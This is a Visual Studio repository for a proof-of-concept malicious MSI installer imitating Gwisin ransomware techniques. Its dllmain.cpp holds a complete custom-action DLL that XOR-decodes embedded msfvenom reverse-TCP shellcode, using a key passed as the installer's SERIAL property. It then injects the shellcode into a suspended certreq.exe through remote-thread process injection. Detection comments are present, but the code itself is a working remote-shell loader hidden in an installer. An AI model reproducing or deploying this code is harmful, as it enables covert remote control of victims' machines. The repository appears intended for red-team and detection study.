├── .gitattributes
├── .gitignore
├── GwisinDll
├── GwisinDll.vcxproj
├── GwisinDll.vcxproj.filters
├── dllmain.cpp
├── framework.h
├── pch.cpp
└── pch.h
├── GwisinMsi.sln
├── GwisinMsi.vdproj
├── README.md
└── image
└── msi-demo.gif
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is needed for earlier builds of msysgit that do not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary, in which case they always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Ll]og/
33 | [Ll]ogs/
34 |
35 | # Visual Studio 2015/2017 cache/options directory
36 | .vs/
37 | # Uncomment if you have tasks that create the project's static files in wwwroot
38 | #wwwroot/
39 |
40 | # Visual Studio 2017 auto generated files
41 | Generated\ Files/
42 |
43 | # MSTest test Results
44 | [Tt]est[Rr]esult*/
45 | [Bb]uild[Ll]og.*
46 |
47 | # NUnit
48 | *.VisualState.xml
49 | TestResult.xml
50 | nunit-*.xml
51 |
52 | # Build Results of an ATL Project
53 | [Dd]ebugPS/
54 | [Rr]eleasePS/
55 | dlldata.c
56 |
57 | # Benchmark Results
58 | BenchmarkDotNet.Artifacts/
59 |
60 | # .NET Core
61 | project.lock.json
62 | project.fragment.lock.json
63 | artifacts/
64 |
65 | # ASP.NET Scaffolding
66 | ScaffoldingReadMe.txt
67 |
68 | # StyleCop
69 | StyleCopReport.xml
70 |
71 | # Files built by Visual Studio
72 | *_i.c
73 | *_p.c
74 | *_h.h
75 | *.ilk
76 | *.meta
77 | *.obj
78 | *.iobj
79 | *.pch
80 | *.pdb
81 | *.ipdb
82 | *.pgc
83 | *.pgd
84 | *.rsp
85 | *.sbr
86 | *.tlb
87 | *.tli
88 | *.tlh
89 | *.tmp
90 | *.tmp_proj
91 | *_wpftmp.csproj
92 | *.log
93 | *.tlog
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary; generally, however, it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produce more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio 6 auto-generated project file (contains which files were open etc.)
298 | *.vbp
299 |
300 | # Visual Studio 6 workspace and project file (working project files containing files to include in project)
301 | *.dsw
302 | *.dsp
303 |
304 | # Visual Studio 6 technical files
305 | *.ncb
306 | *.aps
307 |
308 | # Visual Studio LightSwitch build output
309 | **/*.HTMLClient/GeneratedArtifacts
310 | **/*.DesktopClient/GeneratedArtifacts
311 | **/*.DesktopClient/ModelManifest.xml
312 | **/*.Server/GeneratedArtifacts
313 | **/*.Server/ModelManifest.xml
314 | _Pvt_Extensions
315 |
316 | # Paket dependency manager
317 | .paket/paket.exe
318 | paket-files/
319 |
320 | # FAKE - F# Make
321 | .fake/
322 |
323 | # CodeRush personal settings
324 | .cr/personal
325 |
326 | # Python Tools for Visual Studio (PTVS)
327 | __pycache__/
328 | *.pyc
329 |
330 | # Cake - Uncomment if you are using it
331 | # tools/**
332 | # !tools/packages.config
333 |
334 | # Tabs Studio
335 | *.tss
336 |
337 | # Telerik's JustMock configuration file
338 | *.jmconfig
339 |
340 | # BizTalk build output
341 | *.btp.cs
342 | *.btm.cs
343 | *.odx.cs
344 | *.xsd.cs
345 |
346 | # OpenCover UI analysis results
347 | OpenCover/
348 |
349 | # Azure Stream Analytics local run output
350 | ASALocalRun/
351 |
352 | # MSBuild Binary and Structured Log
353 | *.binlog
354 |
355 | # NVidia Nsight GPU debugger configuration file
356 | *.nvuser
357 |
358 | # MFractors (Xamarin productivity tool) working folder
359 | .mfractor/
360 |
361 | # Local History for Visual Studio
362 | .localhistory/
363 |
364 | # Visual Studio History (VSHistory) files
365 | .vshistory/
366 |
367 | # BeatPulse healthcheck temp database
368 | healthchecksdb
369 |
370 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
371 | MigrationBackup/
372 |
373 | # Ionide (cross platform F# VS Code tools) working folder
374 | .ionide/
375 |
376 | # Fody - auto-generated XML schema
377 | FodyWeavers.xsd
378 |
379 | # VS Code files for those working on multiple tools
380 | .vscode/*
381 | !.vscode/settings.json
382 | !.vscode/tasks.json
383 | !.vscode/launch.json
384 | !.vscode/extensions.json
385 | *.code-workspace
386 |
387 | # Local History for Visual Studio Code
388 | .history/
389 |
390 | # Windows Installer files from build outputs
391 | *.cab
392 | *.msi
393 | *.msix
394 | *.msm
395 | *.msp
396 |
397 | # JetBrains Rider
398 | *.sln.iml
399 |
--------------------------------------------------------------------------------
/GwisinDll/GwisinDll.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {26c1987e-1cbf-4cdd-9e2d-736306cc534a}
25 | GwisinDll
26 | 10.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v142
39 | true
40 | MultiByte
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v142
52 | true
53 | MultiByte
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 | $(ProjectDir)$(Platform)\$(Configuration)\
85 | $(ProjectDir)$(Platform)\$(Configuration)\
86 |
87 |
88 |
89 | Level3
90 | true
91 | WIN32;_DEBUG;GWISINDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
92 | true
93 | Use
94 | pch.h
95 |
96 |
97 | Windows
98 | true
99 | false
100 |
101 |
102 |
103 |
104 | Level3
105 | true
106 | true
107 | true
108 | _CRT_SECURE_NO_WARNINGS
109 | true
110 | Use
111 | pch.h
112 |
113 |
114 | Windows
115 | true
116 | true
117 | false
118 | false
119 |
120 |
121 |
122 |
123 | Level3
124 | true
125 | _DEBUG;GWISINDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
126 | true
127 | Use
128 | pch.h
129 |
130 |
131 | Windows
132 | true
133 | false
134 |
135 |
136 |
137 |
138 | Level3
139 | true
140 | true
141 | true
142 | _CRT_SECURE_NO_WARNINGS
143 | true
144 | Use
145 | pch.h
146 |
147 |
148 | Windows
149 | true
150 | true
151 | false
152 | false
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 | Create
163 | Create
164 | Create
165 | Create
166 |
167 |
168 |
169 |
170 |
171 |
--------------------------------------------------------------------------------
/GwisinDll/GwisinDll.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 | Source Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/GwisinDll/dllmain.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #pragma comment(lib, "msi.lib")
7 |
8 | // credit: Sektor7 RTO Malware Essential Course
/*
 * Repeating-key XOR applied in place over data[0 .. data_len).
 *
 * data     - buffer transformed in place; XOR is its own inverse, so the same
 *            call both encodes and decodes.
 * data_len - number of bytes of data to transform (0 leaves data untouched).
 * key      - key bytes that are cycled over the data.
 * key_len  - length supplied by the caller. Quirk: the key index wraps to 0
 *            as soon as it reaches key_len - 1, so key[key_len - 1] is never
 *            used. Callers wanting every byte of a NUL-terminated key pass
 *            strlen(key) + 1 (the skipped byte is then the terminator).
 *            A key_len of 1 uses key[0] only; key_len 0 is not handled.
 *
 * No bounds checking is performed on either buffer.
 */
void XOR(char* data, size_t data_len, char* key, size_t key_len) {
    size_t keyPos = 0;

    for (size_t pos = 0; pos < data_len; ++pos) {
        // Wrap one byte early: key[key_len - 1] is never applied.
        if (keyPos == key_len - 1) {
            keyPos = 0;
        }
        data[pos] ^= key[keyPos++];
    }
}
20 |
/*
 * MSI custom-action entry point. GwisinMsi.vdproj names this function as the
 * custom action's EntryPoint and supplies CustomActionData built from the
 * SERIAL / LICENSE public properties given on the msiexec command line.
 *
 * What the function does, in order:
 *   1. reads CustomActionData via MsiGetProperty and splits it with strtok;
 *   2. uses the SERIAL value as the repeating XOR key to decode buf in place;
 *   3. starts certreq.exe suspended and windowless, copies the decoded buf
 *      into it, changes that region to PAGE_EXECUTE_READ and starts a remote
 *      thread on it.
 *
 * hInstall - installer session handle supplied by msiexec.
 * Returns 0 (ERROR_SUCCESS) unconditionally: no return value of any MSI or
 * Win32 call below is checked, and hProc, rThread, pi.hProcess and
 * pi.hThread are never closed.
 *
 * Detection notes (defender view; everything listed is visible below):
 *   - certreq.exe created by the installer process that loaded this DLL,
 *     with CREATE_SUSPENDED | CREATE_NO_WINDOW, and not resumed here;
 *   - the cross-process VirtualAllocEx(RW) -> WriteProcessMemory ->
 *     VirtualProtectEx(PAGE_EXECUTE_READ) -> CreateRemoteThread sequence
 *     against that child;
 *   - the XOR key travels in clear text as the SERIAL property on the
 *     msiexec command line, so command-line auditing of msiexec recovers it.
 */
extern "C" __declspec(dllexport) UINT __stdcall GwisinCustom(MSIHANDLE hInstall) {
    // Unused: the si / pi declared further down are what CreateProcess receives.
    PROCESS_INFORMATION processInformation;
    STARTUPINFO startupInfo;
    BOOL creationResult;

    // msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.40.182 lport=8443 exitfunc=thread --encrypt xor --encrypt-key "serialmorelikecereal" -f c
    // msiexec.exe /qn /i SERIAL=serialmorelikecereal
    // XOR-encoded payload bytes; decoded in place by the XOR() call below.
    unsigned char buf[] =
    "\x8f\x2d\xf1\x8d\x91\x84\xa1\x6f\x72\x65\x2d\x38\x2a\x35\x31"
    "\x34\x24\x2d\x50\xbe\x16\x2d\xf9\x3b\x01\x24\xe6\x3d\x6a\x2d"
    "\xe7\x3b\x4b\x2d\xe8\x17\x22\x2d\x6e\xdb\x39\x2f\x3f\x58\xa8"
    "\x24\x5c\xaf\xde\x59\x0d\x15\x69\x49\x43\x24\xb3\xac\x6c\x2d"
    "\x72\xa4\x90\x84\x33\x24\xe6\x3d\x52\xee\x2e\x55\x2a\x34\x2b"
    "\x64\xa2\x03\xe0\x14\x6b\x6e\x70\x66\xe4\x1e\x6d\x6f\x72\xee"
    "\xec\xe1\x6b\x65\x63\x2d\xf7\xa5\x15\x0b\x3b\x64\xa2\x39\xea"
    "\x24\x75\x2b\xf9\x25\x4c\x20\x6a\xb5\x80\x33\x3f\x54\xa8\x24"
    "\x8c\xac\x33\xe2\x55\xe4\x25\x6e\xa4\x2d\x5d\xa9\xc7\x24\xa2"
    "\xac\x7f\x24\x60\xad\x4b\x85\x07\x98\x2d\x6f\x21\x4b\x7a\x20"
    "\x55\xb8\x1e\xbd\x3b\x21\xf9\x25\x45\x25\x72\xb5\x14\x28\xea"
    "\x60\x25\x2b\xf9\x25\x70\x20\x6a\xb5\x22\xee\x76\xed\x20\x34"
    "\x32\x3d\x3a\x68\xb1\x32\x34\x35\x33\x3d\x2d\x30\x2a\x3f\x2b"
    "\xe6\x9e\x45\x20\x3e\x8c\x85\x2a\x28\x38\x36\x25\xe4\x60\x8c"
    "\x27\x96\x94\x9a\x3e\x2c\xcc\x12\x12\x5e\x2c\x56\x40\x69\x61"
    "\x2d\x3b\x26\xfb\x83\x24\xe8\x87\xc5\x62\x65\x72\x2c\xe8\x89"
    "\x3a\xd9\x70\x69\x41\x97\xad\xc7\x5a\xd3\x2d\x3d\x22\xec\x87"
    "\x29\xfb\x94\x20\xd6\x3f\x12\x54\x6e\x9e\xb9\x21\xe6\x98\x0d"
    "\x6d\x68\x6b\x65\x3a\x24\xc8\x4c\xe1\x07\x73\x9a\xa7\x03\x6b"
    "\x2d\x33\x3f\x22\x28\x5d\xa0\x26\x54\xa3\x2d\x8d\xa5\x29\xe5"
    "\xb1\x2d\x8d\xa9\x29\xe5\xac\x2e\xc8\x8f\x63\xb6\x8b\x9a\xb6"
    "\x2d\xfb\xa2\x0b\x7c\x32\x3d\x3e\xe0\x83\x24\xe4\x96\x33\xdf"
    "\xf5\xcc\x1f\x04\x9c\xb0\xf7\xa5\x15\x66\x3a\x9a\xbc\x1c\x84"
    "\x84\xfe\x6f\x72\x65\x24\xea\x87\x75\x2b\xec\x90\x28\x50\xa5"
    "\x19\x61\x33\x31\x29\xe5\x94\x2e\xc8\x67\xb5\xa1\x34\x9a\xb6"
    "\xe6\x8a\x65\x1f\x39\x3b\xe6\xb6\x49\x3f\xe5\x9b\x05\x32\x24"
    "\x35\x01\x6b\x75\x63\x65\x33\x3d\x29\xe5\x81\x2d\x43\xa0\x20"
    "\xd6\x35\xcb\x21\x80\x93\xbc\x23\xec\xa0\x2c\xfb\xa2\x2c\x5d"
    "\xba\x2c\xfb\x99\x29\xe5\xb7\x27\xfb\x9c\x2d\xd3\x69\xbc\xab"
    "\x3a\x8d\xb0\xe2\x94\x73\x18\x5a\x31\x20\x3b\x34\x07\x72\x25"
    "\x6c\x69\x2a\x3d\x09\x65\x28\x24\xdb\x67\x5c\x6a\x42\x96\xb4"
    "\x3b\x34\x2e\xc8\x10\x02\x24\x0a\x9a\xb6\x2c\x8d\xab\x88\x50"
    "\x8c\x9a\x8d\x21\x60\xaf\x25\x46\xb4\x2d\xe9\x9f\x1e\xd1\x22"
    "\x9a\x95\x3d\x0b\x6c\x2a\xde\x92\x74\x4b\x66\x2c\xe6\xa8\x9a"
    "\xb9";

    // Fixed 256-byte property buffer; msiPropLength is in/out for MsiGetProperty.
    char msiPropValue[256];
    DWORD msiPropLength = 256;

    // Get custom action data from commandline. ex) msiexec /qn /i SERIAL= LICENSE=
    // The return code is not checked; msiPropValue is used as-is afterwards.
    MsiGetProperty(hInstall, TEXT("CustomActionData"), msiPropValue, &msiPropLength);

    // First token up to the space is "SERIAL=<value>"; the remainder is the
    // license token (GwisinMsi.vdproj spells that key LICENS=, not LICENSE=).
    char* tSerial = strtok((char*)msiPropValue, " ");
    char* tLicense = strtok(NULL, "");

    // Serial value from msiexec commandline. Used as xor key for shellcode decryption.
    // serial -> text before '=', serialValue -> everything after it.
    char* serial = strtok((char*)tSerial, "=");
    char* serialValue = strtok(NULL, "");

    // License value is ignored in this PoC.
    char* license = strtok((char*)tLicense, "=");
    char* licenseValue = strtok(NULL, "");

    // Decrypt shellcode with serial value. +1 because null terminator at the end
    // (XOR() never applies its last key byte, so +1 makes the whole serial the
    // key; sizeof(buf) includes buf's own trailing NUL, which is decoded too).
    XOR((char*)buf, sizeof(buf), serialValue, strlen(serialValue) + 1);

    STARTUPINFO si;
    si.cb = sizeof(si);
    ZeroMemory(&si, sizeof(si));

    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));

    // Certreq because Gwisin used it. No window + suspended for no gui.
    // The child's primary thread is never resumed anywhere in this function.
    CreateProcess("C:\\windows\\system32\\certreq.exe", NULL, 0, 0, FALSE, CREATE_NO_WINDOW | CREATE_SUSPENDED, NULL, "C:\\Windows\\system32", &si, &pi);

    // Re-opens the child by PID with PROCESS_ALL_ACCESS even though pi.hProcess
    // already refers to it; neither handle is closed.
    DWORD pid = pi.dwProcessId;
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    // Allocate RW, write, then flip to RX: there is no single RWX region, but
    // the RW->RX change on a freshly written remote region is itself a
    // well-known telemetry point for EDR / ETW consumers.
    LPVOID pAlloc = VirtualAllocEx(hProc, nullptr, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    SIZE_T bytesWritten;
    WriteProcessMemory(hProc, pAlloc, buf, sizeof(buf), &bytesWritten);
    DWORD flProtect = 0;
    VirtualProtectEx(hProc, pAlloc, sizeof(buf), PAGE_EXECUTE_READ, &flProtect);
    //Sleep(20000); // debug
    // The thread handle is discarded; nothing waits on or checks the remote thread.
    HANDLE rThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pAlloc, NULL, 0, NULL);

    // Always reports success to the installer, whatever happened above, so the
    // MSI completes "normally" from the user's point of view.
    return 0;
}
107 |
// Exported self-registration stub. Performs no registration of any kind and
// always reports success (0, i.e. S_OK) to whatever loaded and invoked it.
extern "C" __declspec(dllexport) HRESULT DllRegisterServer() {
    const HRESULT noWorkDone = 0;
    return noWorkDone;
}
111 |
// Exported self-unregistration stub, the mirror of DllRegisterServer above:
// nothing is undone because nothing was registered; always returns 0 (S_OK).
extern "C" __declspec(dllexport) HRESULT DllUnregisterServer() {
    const HRESULT noWorkDone = 0;
    return noWorkDone;
}
115 |
/*
 * Standard DLL entry point. Every attach/detach reason is a deliberate no-op;
 * this module does its work only when the installer calls GwisinCustom.
 *
 * hModule            - module handle of this DLL (unused).
 * ul_reason_for_call - DLL_PROCESS_ATTACH / DLL_THREAD_ATTACH /
 *                      DLL_THREAD_DETACH / DLL_PROCESS_DETACH (all ignored).
 * lpReserved         - reserved by the loader (unused).
 * Returns TRUE so that loading the DLL never fails on account of this function.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;

    // The reasons are spelled out only to make the intentional no-op explicit.
    const bool knownReason =
        ul_reason_for_call == DLL_PROCESS_ATTACH ||
        ul_reason_for_call == DLL_THREAD_ATTACH ||
        ul_reason_for_call == DLL_THREAD_DETACH ||
        ul_reason_for_call == DLL_PROCESS_DETACH;
    (void)knownReason;

    return TRUE;
}
--------------------------------------------------------------------------------
/GwisinDll/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
4 | // Windows Header Files
5 | #include
6 |
--------------------------------------------------------------------------------
/GwisinDll/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to the pre-compiled header
2 |
3 | #include "pch.h"
4 |
5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
6 |
--------------------------------------------------------------------------------
/GwisinDll/pch.h:
--------------------------------------------------------------------------------
1 | // pch.h: This is a precompiled header file.
2 | // Files listed below are compiled only once, improving build performance for future builds.
3 | // This also affects IntelliSense performance, including code completion and many code browsing features.
4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds.
5 | // Do not add files here that you will be updating frequently as this negates the performance advantage.
6 |
7 | #ifndef PCH_H
8 | #define PCH_H
9 |
10 | // add headers that you want to pre-compile here
11 | #include "framework.h"
12 |
13 | #endif //PCH_H
14 |
--------------------------------------------------------------------------------
/GwisinMsi.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32802.440
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{54435603-DBB4-11D2-8724-00A0C9A8B90C}") = "GwisinMsi", "GwisinMsi.vdproj", "{8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GwisinDll", "GwisinDll\GwisinDll.vcxproj", "{26C1987E-1CBF-4CDD-9E2D-736306CC534A}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Debug|x64.ActiveCfg = Debug
19 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Debug|x64.Build.0 = Debug
20 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Debug|x86.ActiveCfg = Debug
21 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Debug|x86.Build.0 = Debug
22 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Release|x64.ActiveCfg = Release
23 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Release|x64.Build.0 = Release
24 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Release|x86.ActiveCfg = Release
25 | {8CDDDCE6-607D-4FDA-9953-6CEFF9C296BA}.Release|x86.Build.0 = Release
26 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Debug|x64.ActiveCfg = Debug|x64
27 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Debug|x64.Build.0 = Debug|x64
28 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Debug|x86.ActiveCfg = Debug|Win32
29 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Debug|x86.Build.0 = Debug|Win32
30 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Release|x64.ActiveCfg = Release|x64
31 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Release|x64.Build.0 = Release|x64
32 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Release|x86.ActiveCfg = Release|Win32
33 | {26C1987E-1CBF-4CDD-9E2D-736306CC534A}.Release|x86.Build.0 = Release|Win32
34 | EndGlobalSection
35 | GlobalSection(SolutionProperties) = preSolution
36 | HideSolutionNode = FALSE
37 | EndGlobalSection
38 | GlobalSection(ExtensibilityGlobals) = postSolution
39 | SolutionGuid = {5599A1D7-28E2-400F-88B8-3965155C5F61}
40 | EndGlobalSection
41 | EndGlobal
42 |
--------------------------------------------------------------------------------
/GwisinMsi.vdproj:
--------------------------------------------------------------------------------
1 | "DeployProject"
2 | {
3 | "VSVersion" = "3:800"
4 | "ProjectType" = "8:{978C614F-708E-4E1A-B201-565925725DBA}"
